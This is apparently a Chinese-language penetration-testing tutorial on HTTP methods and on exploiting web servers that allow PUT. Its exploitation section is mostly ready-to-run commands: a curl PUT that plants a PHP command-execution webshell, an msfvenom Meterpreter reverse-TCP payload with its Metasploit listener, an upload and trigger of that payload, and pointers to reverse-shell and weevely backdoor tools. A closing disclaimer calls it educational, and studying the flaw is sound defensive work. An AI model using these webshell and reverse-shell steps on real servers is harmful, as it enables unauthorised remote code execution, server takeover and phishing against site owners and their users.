什么是 HTTP 方法?

HTTP 方法是定义客户端想要对由 URI(统一资源标识符)标识的指定资源执行的操作的动词。它们在 HTTP(超文本传输协议)中使用,以促进客户端(例如 Web 浏览器或移动应用程序)与服务器之间的通信。每种方法指定要对资源执行的不同类型的操作。

常见 HTTP 方法解释

  1. GET:使用提供的 URI 从服务器检索信息;应该只检索数据而不改变它。

  2. HEAD:与 GET 类似,但仅传输状态行和标头部分,不包括响应正文。

  3. POST:向服务器发送数据,例如表单提交或文件上传,通常用于创建或更新资源

  4. PUT:用提供的内容替换目标资源的所有当前表示。

  5. DELETE:删除 URI 标识的目标资源的所有当前表示。

  6. TRACE:沿着到目标资源的路径执行消息环回测试,允许客户端查看中间服务器对请求进行了哪些更改或添加。

  7. 选项:描述可用于目标资源的通信选项。

# 现在让我们破解

什么是 HTTP PUT 方法

HTTP PUT 方法通常用于上传保存在服务器上用户提供的 URL 上的数据。如果启用,攻击者可能能够将任意且可能恶意的内容放入应用程序中。

根据服务器的配置,这可能会导致其他用户受到损害(通过上传客户端可执行脚本)、服务器受到损害(通过上传服务器可执行代码)或其他攻击。

是否启用 PUT 方法测试?

注意:这是一个如何测试 put 方法是否启用的示例,http://testhtml5.vulnweb.com/是作为安全培训实验室而制作的。

curl您可以通过向特定 URL 发送 PUT 请求并观察响应来测试服务器上是否启用了 PUT 方法。

curl -i -s -k -X OPTIONS 'http://testhtml5.vulnweb.com/'

2. 通过发送 OPTIONS 方法使用 BurpSuit

检查响应中的“允许”方法:如果 PUT 方法为 ,则尝试文件上传。

如果 PUT 方法启用,则响应标头示例:

Allow: HEAD, OPTIONS, GET , PUT

这是响应如何允许标头结果的另一个示例:

漏洞利用步骤

1.上传 POC.txt 文件以演示文件上传功能。

curl -X PUT "https://site.com/POC.txt"  -H "Content-Type: text/plain" -d "{POC Mohanad}"

导航到 https://site.com/POC.txt,您应该有这样的响应

2. 远程代码执行 (RCE)

curl -X PUT -d "<?php echo system (($_REQUEST['cmd'])); ?>" http://site.com/shell.php

<?php echo system (($_REQUEST['cmd'])); ?> PHP 代码可在 Linux 和 Windows 服务器上运行。

http://site.com/shell.php?cmd=[Your Command Here]

请记住,如果服务器不支持指定 URL 的 PUT 方法,您可能会收到 405 方法不允许状态代码。

使用 Metasploit

Metasploit 框架是开发、测试和执行漏洞利用的著名平台。作为一种开源工具,它促进了针对易受攻击系统的一系列漏洞利用。具体来说,在框架中,存在一个模块,能够通过利用 PUT 和 DELETE HTTP 请求来上传和删除 Web 内容,从而利用配置错误的 Web 服务器。用户可以将 ACTION 参数设置为 PUT 或 DELETE,其中 PUT 是默认选项。

1.Create PHP Payload 创建 PHP 有效负载

msfvenom -p php/meterpreter/reverse_tcp lhost=[Listening IP] lport=[Listening PORT] -f raw > meterpreter.php

修改文件以确保脚本包含正确的 PHP 打开和结束标记.

2. 接下来,我们将在 Metasploit 中设置侦听器,以使用以下命令拦截反向 shell:

use exploit/multi/handlerset payload php/meterpreter/reverse_tcp// Be sure to set the payload here otherwise you might get errorsset lhost [Listening IP]set lport [Listening PORT]run

3. 使用 curl 命令上传文件

curl -i -X PUT -T meterpreter.php http://site.com/meterpreter.php

4. 有时您需要导航到 

http://site.com/meterpreter.php

以便 Meterpreter 会话启动。

其他想法

1.您可以从 GitHub 使用 Shell,示例:

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php?source=post_page-----a1077829d4c5--------------------------------

2.您可以使用非常好的工具称为weevely,您可以创建一个PHP Shell文件,设置密码并连接到主机。

https://www.kali.org/tools/weevely/?source=post_page-----a1077829d4c5--------------------------------

利用 weevely : 

https://infosecwriteups.com/how-to-generate-a-php-backdoor-using-weevely-5c1dda909b79

Impact

在没有适当安全措施的情况下启用 PUT 方法会为潜在的灾难性后果打开闸门。通过允许任何人(包括恶意行为者)将文件上传到服务器,该漏洞使系统面临多种风险,每种风险都会产生严重影响。

1.服务器入侵:攻击者可以将 shell 上传到服务器上,授予他们对计算机的完全访问和控制权,允许他们执行命令、操纵数据,甚至提升权限。

2.网络钓鱼攻击:借助上传文件的能力,攻击者可以制作模仿合法网站的虚假登录页面。毫无戒心的用户可能会输入他们的凭据,在不知不觉中将其交给攻击者,从而导致帐户泄露并可能被进一步利用。

免责声明

本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本平台和发布者不为此承担任何责任。